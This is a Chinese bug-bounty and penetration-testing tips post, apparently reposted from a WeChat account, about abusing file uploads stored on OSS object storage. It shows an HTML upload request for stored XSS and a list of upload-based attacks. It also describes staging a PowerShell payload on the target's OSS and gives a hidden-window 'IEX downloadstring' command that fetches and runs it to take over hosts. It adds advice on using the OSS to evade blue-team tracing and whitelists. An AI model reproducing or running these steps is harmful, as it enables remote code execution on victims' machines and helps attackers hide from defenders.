0x01 前言
在日常挖SRC还有渗透时,很多时候我们可能会遇到一个情况,发现一个上传点可以上传文件但是不能解析!文件传到OSS去了。到这里可能有的师傅就已经开始离开这伤心站点了
虽然文件上传到OSS危害不大,但是我们组合其他漏洞打出一点小伤害还是能拿到SRC的一点泡面钱的,下面分享我常用的两个小tips供各位参考。
末尾可领取资源文件
0x02 OSS打XSS
漏洞场景:发现站点存在文件上传,但文件传到了OSS,并且无法解析动态脚本,为了能挣点泡面钱,可以尝试上传html来凑个存储XSS。
------WebKitFormBoundary0orTsGAmHsHaAUgyContent-Disposition: form-data; name="file"; filename="favicon.html"Content-Type: text/html<script>alert(1)</script>------WebKitFormBoundary0orTsGAmHsHaAUgy--
有些网站限制了只能图片上传,这时可以试试传svg格式的图片
这里虽然是下载了传上去的文件但无法触发XSS,但是这里还可以用其他洞再打一波组合拳,但是漏洞利用条件也高了,所以有些SRC也就不收了
这里根据上传文件的后缀可以拓展其他攻击的方式,附上文件上传漏洞利用方式 Top10,感兴趣的师傅可以去研究研究
1. ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE2. SVG: 存储 XSS / SSRF / XXE3. GIF: 存储 XSS / SSRF4. CSV: CSV 注⼊5. XML: XXE6. AVI: LFI / SSRF7. HTML / JS : HTML 注⼊ / XSS / 开放重定向8. PNG / JPEG: 像素洪⽔攻击 (DoS)9. ZIP: RCE via LFI / DoS10. PDF / PPTX: SSRF / 盲打 XXE
0x03 OSS文件跳板
漏洞场景:发现站点存在文件上传,但文件传到了OSS,并且无法解析动态脚本。
这个和上面打XSS差不多一个意思,这里传我们的powershell脚本或者其他脚本到目标的OSS上,因为OSS只存储静态的文件那么我们就可以把上线的脚本传上去让其他主机来访问。
这里作为一个跳板也能防止蓝队溯源到你的真实服务器,让蓝队溯到其他人身上,但这也会把上线的脚本一直留在OSS上,所以后面还得做其他方面的防溯源的手段,所以还是有利有弊吧。
------WebKitFormBoundary0orTsGAmHsHaAUgyContent-Disposition: form-data; name="file"; filename="favicon.html"Content-Type: text/html$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("H4sIAAAAAAAA/+y9Wa/qSrIu+rzrV8yHLa21xNo1wIAxR9rSNTYY444eTJ1SyRjjBtw3YM49//1GZBoGY865VtXW1rkPV3dKUwyMnU1kxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx------WebKitFormBoundary0orTsGAmHsHaAUgy--
命令执行上线主机
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://pikachu.test/vul/unsafeupload/uploads/favicon.html'))"
补充一点,在某些时候目标设置了某个高可信域名为白名单域名,只要是这个白名单域名的那么都是可信然后放行,如果是不可信的直接拦下审计,这时如果我们传了脚本上去就可以绕开目标的一些白名单策略。
0x05 总结
之前遇到这种情况,我也是上传html文件,说危害就说比如有xss、非法言语等,但是最近有了新的思路。喜欢的师傅可以点赞转发支持一下谢谢!
0x06
原文始发于微信公众号(渗透安全HackTwo):OSS任意文件上传的小技巧|挖洞技巧
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论